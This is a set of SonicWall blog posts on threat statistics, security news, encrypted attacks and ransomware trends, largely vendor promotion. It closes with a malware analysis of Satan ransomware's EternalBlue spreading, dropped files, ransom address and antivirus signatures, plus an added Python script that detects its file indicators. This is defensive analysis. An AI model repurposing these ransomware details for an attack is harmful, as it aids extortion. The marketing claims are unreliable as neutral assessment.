In addition, SonicWall Capture Labs logged 9.32 billion malware attacks. Network attacks using encryption tactics are also on the rise. Without the ability to inspect such traffic, an average organization would have missed over 900 file-based attacks per year hidden by SSL/TLS encryption.

IoT attacks loom

Internet of Things (IoT) threats and memory attacks are also impending challenges that we face across wired and wireless solutions. According to Gartner, by 2020, IoT technology will be in 95 percent of electronics for new product designs.

A recent Spiceworks survey rated IoT devices as the most vulnerable to Wi-Fi attacks, which makes IoT and chip processors the emerging battlegrounds. IoT is also a big target because "smart" (pun intended) hardware is not updated regularly and is often physically located in unknown or hard-to-reach places, leaving memory attacks and vulnerabilities unaddressed.

IoT ransomware attacks are alone on the rise and gain control of a device’s functionality. While many of the IoT devices may not hold any valuable data, there is a risk for owners or individuals to be held at ransom for personal data. Gartner also predicts, through 2022, half of all security budgets for IoT will go to fault remediation, recalls and safety failures rather than protection.

Many smart devices and IoT devices on the market connect over Wi-Fi, such as cameras and TVs. Imagine an attack on your personal privacy in which a hacker gains control over such a device. Distributed Denial of Service (DDoS) attacks remain a major threat involving these devices: each compromised device can send up to 30 million packets per second at the target, creating an IoT-powered botnet.

In fact, at one point in 2017, SonicWall Capture Labs was recording more than 62,000 IoT Reaper hits each day. Considering there could be an estimated 6 billion mobile devices in circulation by 2020, it would not be surprising if the next wave of ransomware targeted mobile devices.

How to secure wired, wireless and mobile networks

It is critical to secure your network, both from a wireless and wired perspective. Total end-to-end security is the key to prevent such attacks from happening in the first place. To survive this cyber war, you can follow certain best practices to ensure your protection:

  • Layer security across your wired, wireless, mobile and cloud network
  • Deploy next-gen firewalls that can provide real-time intrusion detection and mitigation
  • Patch your firewalls and endpoint devices to the latest firmware
  • Secure your IoT devices to prevent device tampering and unauthorized access
  • Educate your employees on the best practices
  • Change default logins and passwords across your devices

SonicWall solutions include next-generation firewalls, 802.11ac Wave 2 access points, secure mobile access appliances and the Capture Advanced Threat Protection (ATP) cloud sandbox service, all of which combine to provide an effective zero-day threat protection ecosystem.

To protect customers against the increasing dangers of zero-day threats, SonicWall's cloud-based Capture ATP service detects and blocks advanced threats at the gateway until a verdict is returned. In addition, Capture ATP also monitors memory-based exploits via Real-Time Deep Memory Inspection (RTDMI). With innovative SonicWall solutions, rest assured your IoT and mobile devices are protected for the cyberwar.

Download the 2018 SonicWall Cyber Threat Report

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.


Cyber Security News & Trends – 04-27-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Bringing Visibility to the Midmarket (Data Breach Today)

  • In a video interview with ISMG’s Data Breach Today, SonicWall’s Bill Conner shares his vision to ensure smaller and mid-sized businesses have a clear view of the threat landscape taking aim at their companies. In the video he expands on the SME visibility challenge, SonicWall’s solutions to improve alerts and analytics and how SonicWall is addressing customer cloud security concerns.

Jonesboro Council Tackles Cybersafety (The Clayton News Daily)

  • Following the recent Atlanta cyberattack, other cities are taking the initiative to bolster their preventive cybersecurity measures, among them Georgia's Jonesboro City Council, which recommended SonicWall's TZ300 firewall to protect the city's financial data.

SonicAlert: New Variant Family of PUBG Ransomware (SonicWall Security Center)

  • The SonicWall Capture Labs Threat Research Team has observed reports of a new variant family of PUBG Ransomware [Pubg.RSM] actively spreading in the wild. PUBG Ransomware encrypts the victim’s files and forces them to play an hour of a game called PlayerUnknown’s Battlegrounds to get their files back.

Cyber Security News

Almost Half UK Businesses Suffered Cyberattack or Security Breach Last Year, Figures Show (The Independent)

  • Nearly half the businesses in the UK have fallen victim to cyberattacks or security breaches in the last year, costing them each thousands of pounds, new data shows.

Global Police Just Shut Down World's Largest Marketplace That Allegedly Disrupted Millions of Sites (The Washington Post)

  • An international police operation recently shut down the world’s largest for-hire service that allegedly slowed and disrupted millions of websites using malicious cyber tools, officials said Wednesday.

Traffic Hijack: Users Sent to Phishing Site in Two-Hour Cryptocurrency Heist (ZDNet)

  • Attackers on Tuesday pulled off a complex attack using kinks in core internet infrastructure that caused users of an Ethereum wallet developer’s website to be redirected to a phishing site.

Huawei Under Criminal Investigation Over Iran Sanctions (The Wall Street Journal)

  • The Justice Department is investigating whether Huawei Technologies Co. violated U.S. sanctions related to Iran, according to people familiar with the matter, opening a new avenue of scrutiny amid wider national-security concerns over the Chinese cellular-electronics giant.

This Ransomware was Rewritten to Mine Cryptocurrency – and Destroy Your Files (ZDNet)

  • Some criminals are shifting from ransomware to cryptocurrency miners — those behind XiaoBa have rejigged the code to shift the same malware towards a different focus.

SonicWall CEO: ‘It’s Time to Arm Up’ Against Malware, Encrypted Attacks

You can’t fight what you can’t see.

Cliché as it may sound, cybercriminals are using organizations’ lack of network visibility as a cornerstone for their attack strategies. Savvy threat actors are encrypting their malware payloads to cloak attacks and defeat standard security controls.

At RSA Conference 2018 in San Francisco, SonicWall president and CEO Bill Conner spoke with TechRepublic about the rapidly changing cyber arms race and the need to properly detect and inspect encrypted traffic, which made up 68 percent of all web traffic in 2017 — a 24 percent year-over-year increase from 2016.

“In Q1, you see a dramatic increase in malware and ransomware. We’re also seeing a dramatic increase in SSL encryption, and encryption being used to carry malware,” Conner told TechRepublic.

As Conner discussed, the 2018 Cyber Threat Report illustrated these challenges. But the threat landscape changes rapidly. In the first quarter of 2018 alone, the average SonicWall customer faced:

  • 7,739 malware attacks (151 percent increase over Q1 2017)
  • 173 ransomware attacks (226 percent increase over Q1 2017)
  • 335 encrypted threats (403 percent increase over Q1 2017)

By investing in updated solutions, and enabling SSL/TLS inspection capabilities, organizations can have the best of both security and performance. Many next-generation firewalls — like the SonicWall NSa series, for example — include DPI-SSL capabilities. However, these critical controls aren’t always activated or implemented properly, so it’s important to confer with your cyber security vendor or managed security services provider (MSSP) that you have the ability to decrypt and inspect SSL and TLS traffic.

Guidance on stopping encrypted cyber attacks

Encrypted threats will defeat even the most robust firewall if it’s not properly using deep packet inspection of SSL and TLS, often known as DPI-SSL.

If you choose not to inspect encrypted traffic — or if your firewall is limited in its ability to do so — you are truly missing a critical value of your firewall.

It is possible for organizations to enjoy the security benefits of SSL/TLS encryption without providing a hidden tunnel for attackers.

For practical guidance on implementing SSL and TLS decryption and inspection abilities, review “Encrypted Cyber Attacks: Real Data Unveils Hidden Danger within SSL, TLS Traffic” or watch the on-demand webcast, “Technical Deep Dive on how to Defeat Encrypted Threats with SonicWall DPI-SSL Technology.”

Ransomware, Variants, Snipers & Kung Fu

The 2018 SonicWall Cyber Threat Report reported a 71.2 percent decline in the number of ransomware attacks, but a 101.2 percent increase in the number of ransomware variants. Let me ask you: is this good news or bad?

If this was a military battle, would you celebrate the news the enemy reduced the number of machine guns by nearly three quarters but doubled the number of snipers? Perhaps, but now you’d have to keep your head lower and stay out of sight.

2016 saw a flood of “spray-and-pray” ransomware attacks as hackers were taking advantage of soft defenses and low levels of employee awareness. In fact, in 2016 SonicWall blocked nearly 640 million ransomware attacks; that was over 1,200 ransoms not seen (or paid) each minute.

Because of this intense pressure, organizations around the globe bolstered their defenses and education efforts. Simply put, we got tired of getting beat up for our lunch money and took Kung-Fu lessons.

Attackers retool ransomware strategies

In 2017, attackers retooled with new exploits. From that, WannaCry, NotPetya and Bad Rabbit were born. Each was designed as a malware cocktail that infected a system and then moved on to the rest of the network through shared drives. But these are just three of the 2,855 variants SonicWall created defenses for in 2017 alone.

With these new malware cocktails in the wild, threat actors targeted specific roles within companies through social engineering. Instead of annoying thousands of people with a small ransom with a shrinking chance they will pay, many switched to hard-hitting attacks with larger demands.

Unique Ransomware Signatures

One such instance was the city of Atlanta, where the SamSam ransomware variant affected five out of 13 city departments and shut down systems for 10 days. Fortunately, the $51,000 ransom went unpaid but the damages to systems, lost files and productivity far outweigh the demand.

How to stop ransomware attacks, avoid ransom payouts

So, what can we do in this period of the threat landscape? Employee awareness for social engineering attacks (e.g., phishing attempts) still needs to drastically improve. Strong password hygiene also needs to be in place to block attacks like SamSam that work off of guessed passwords.

From there, we need ransomware protection technology in place that stops attacks. Here are two core technologies you may not have thought of recently:

  1. Implement a network sandbox that can identify and stop unknown attacks.

    A network sandbox is an isolated environment on the firewall that runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be achieved.

    Capture ATP also features Real-Time Deep Memory Inspection™ (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience. Learn about its ability to find and block malicious PDFs and Office documents.

  2. Use advanced endpoint client security

    For years, companies deployed traditional anti-virus (AV) on their computers, which was fine when the total number of signatures they had to write and update numbered in the hundreds of thousands. Last year, SonicWall discovered 58 million new forms of malware, each of which takes time to write a signature for and push to defense points such as firewalls.

    Even if these are pushed within 24 hours, it leaves a gap that new and advanced malware can walk right through. I recommend using a next-generation anti-virus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files. For example, SonicWall Capture Client delivers advanced malware protection and additional security synergies for SonicWall firewall users.

On top of these two new forms of technology, please follow best practices when securing and managing your networks, such as network segmentation.

Download the 2018 SonicWall Cyber Threat Report

The cyber arms race is a challenge we face together. And it’s the core reason we’re committed to passing our findings, intelligence, analysis and research to the global public via the SonicWall 2018 Cyber Threat Report.


Satan Ransomware employs EternalBlue Exploit Kit

Description

The SonicWall Capture Labs Threat Research Team has received reports of a new variant of the Satan ransomware. Satan has been around since early 2017, but it was not until late 2017 that we saw it adopt the EternalBlue exploit kit. This is the same exploit kit that was, and still is, used by ransomware such as WannaCry and BadRabbit, and it is employed to spread more effectively through internal networks.

Infection Cycle:

Upon infection, the Trojan encrypts files on the system and prepends [satan_pro@mail.ru] to the original filename. After infection it displays the following text:

The Trojan drops the following files to the filesystem:

  • %ALLUSERSPROFILE%\client.exe [Detected as GAV: Suspicious#mpress.2 (Trojan)]
  • %ALLUSERSPROFILE%\blue.exe [Detected as GAV: Squida.A_2 (Trojan)]
  • %ALLUSERSPROFILE%\blue.fb
  • %ALLUSERSPROFILE%\blue.xml
  • %ALLUSERSPROFILE%\cnli-1.dll [Detected as GAV: MalAgent.J_39290 (Trojan)]
  • %ALLUSERSPROFILE%\coli-0.dll [Detected as GAV: Downloader.A_1172 (Trojan)]
  • %ALLUSERSPROFILE%\crli-0.dll [Detected as GAV: MalAgent.J_29735 (Trojan)]
  • %ALLUSERSPROFILE%\dmgd-4.dll [Detected as GAV: Artemis.A_162 (Trojan)]
  • %ALLUSERSPROFILE%\down64.dll
  • %ALLUSERSPROFILE%\exma-1.dll [Detected as GAV: Shadowbrokers.D_5 (Trojan)]
  • %ALLUSERSPROFILE%\libeay32.dll
  • %ALLUSERSPROFILE%\libxml2.dll
  • %ALLUSERSPROFILE%\ms.exe [Detected as GAV: SatanCryptor.RSM_2 (Trojan)]
  • %ALLUSERSPROFILE%\posh-0.dll [Detected as GAV: MalAgent.J_21737 (Trojan)]
  • %ALLUSERSPROFILE%\ssleay32.dll [Detected as GAV: Eqtonex.A_6 (Trojan)]
  • %ALLUSERSPROFILE%\star.exe [Detected as GAV: MalAgent.J_8604 (Trojan)]
  • %ALLUSERSPROFILE%\tibe-2.dll [Detected as GAV: MalAgent.H_9335 (Trojan)]
  • %ALLUSERSPROFILE%\star.xml
  • %ALLUSERSPROFILE%\tucl-1.dll [Detected as GAV: Shadowbrokers.DZ (Trojan)]
  • %ALLUSERSPROFILE%\trfo-2.dll [Detected as GAV: Downloader.A_1169 (Trojan)]
  • %ALLUSERSPROFILE%\tucl-1.dll [Detected as GAV: MalAgent.J_21729 (Trojan)]
  • %ALLUSERSPROFILE%\ucl.dll
  • %ALLUSERSPROFILE%\xdvl-0.dll [Detected as GAV: Eqtonex.A_2 (Trojan)]
  • %ALLUSERSPROFILE%\zlib1.dll [Detected as GAV: MalAgent.J_35104 (Trojan)]

The Trojan reports the infection to a C&C server:

The Trojan downloads and runs ms.exe and setup.exe from the C&C server:

We observed the Trojan running blue.exe with its command-line arguments. This is an attempt to spread to other machines on the internal network:

Some configuration strings can be seen in the Trojan's memory after it is unpacked:

The Trojan instructs victims to send 0.3 BTC to 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo. It seems that some have fallen prey to its scheme:

We reached out to satan_pro@mail.ru concerning file decryption but did not receive a response.
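As an added triage example (not code from the SonicWall analysis), the script below sorts a constructed list of file paths into the two artifact classes described above: files renamed with the prepended [satan_pro@mail.ru] marker, whose original names are recovered by stripping the prefix, and the dropped components under %ALLUSERSPROFILE%, which is assumed here to resolve to C:\ProgramData. The directory count lets a responder see which local folders and network shares the encryption reached.

```python
import ntpath
from collections import Counter

# Marker the page reports Satan prepends to each encrypted file's name.
SATAN_PREFIX = "[satan_pro@mail.ru]"
# File names the page reports Satan drops under %ALLUSERSPROFILE%.
DROPPED_ARTIFACTS = {
    "client.exe", "blue.exe", "blue.fb", "blue.xml", "cnli-1.dll", "coli-0.dll",
    "crli-0.dll", "dmgd-4.dll", "down64.dll", "exma-1.dll", "libeay32.dll",
    "libxml2.dll", "ms.exe", "posh-0.dll", "ssleay32.dll", "star.exe",
    "tibe-2.dll", "star.xml", "tucl-1.dll", "trfo-2.dll", "ucl.dll",
    "xdvl-0.dll", "zlib1.dll",
}
# Assumption: %ALLUSERSPROFILE% resolves to C:\ProgramData on the examined host.
DROP_DIR = r"c:\programdata"

def triage(paths):
    """Sort Windows file paths into Satan indicators: renamed (encrypted) files
    with their original name recovered, dropper hits under %ALLUSERSPROFILE%,
    and encrypted-file counts per directory to show which shares were touched."""
    encrypted, dropped, by_dir = [], [], Counter()
    for path in paths:
        directory, name = ntpath.split(path)
        if name.startswith(SATAN_PREFIX):
            encrypted.append((path, name[len(SATAN_PREFIX):]))
            by_dir[directory.lower()] += 1
        elif (name.lower() in DROPPED_ARTIFACTS
              and directory.lower().rstrip("\\") == DROP_DIR):
            dropped.append(path)  # same name elsewhere (e.g. System32) is not a hit
    return {"encrypted": encrypted, "dropped": dropped, "by_dir": dict(by_dir)}

def verdict(result):
    """Dropper files plus renamed files together indicate the full chain ran."""
    if result["encrypted"] and result["dropped"]:
        return "satan-full-chain"
    if result["dropped"]:
        return "satan-dropper-only"
    return "satan-encrypted-files" if result["encrypted"] else "clean"

# Constructed sample listing, not taken from a real host.
SAMPLE_PATHS = [
    r"C:\ProgramData\blue.exe", r"C:\ProgramData\ms.exe", r"C:\ProgramData\libxml2.dll",
    r"C:\Users\alice\Documents\[satan_pro@mail.ru]budget.xlsx", r"C:\Windows\System32\zlib1.dll",
    r"\\fileserver\finance\[satan_pro@mail.ru]q1.docx", r"C:\Users\alice\Documents\notes.txt",
]

if __name__ == "__main__":
    report = triage(SAMPLE_PATHS)
    print(verdict(report), report)
```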

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Satan.RSM (Trojan)
  • GAV: SatanCryptor.RSM_2 (Trojan)
  • GAV: Suspicious#mpress.2 (Trojan)
  • GAV: Squida.A_2 (Trojan)
  • GAV: MalAgent.J_39290 (Trojan)
  • GAV: Downloader.A_1172 (Trojan)
  • GAV: MalAgent.J_29735 (Trojan)
  • GAV: Artemis.A_162 (Trojan)
  • GAV: Shadowbrokers.D_5 (Trojan)
  • GAV: MalAgent.J_21737 (Trojan)
  • GAV: Eqtonex.A_6 (Trojan)
  • GAV: MalAgent.J_8604 (Trojan)
  • GAV: MalAgent.H_9335 (Trojan)
  • GAV: Shadowbrokers.DZ (Trojan)
  • GAV: Downloader.A_1169 (Trojan)
  • GAV: MalAgent.J_21729 (Trojan)
  • GAV: Eqtonex.A_2 (Trojan)
  • GAV: MalAgent.J_35104 (Trojan)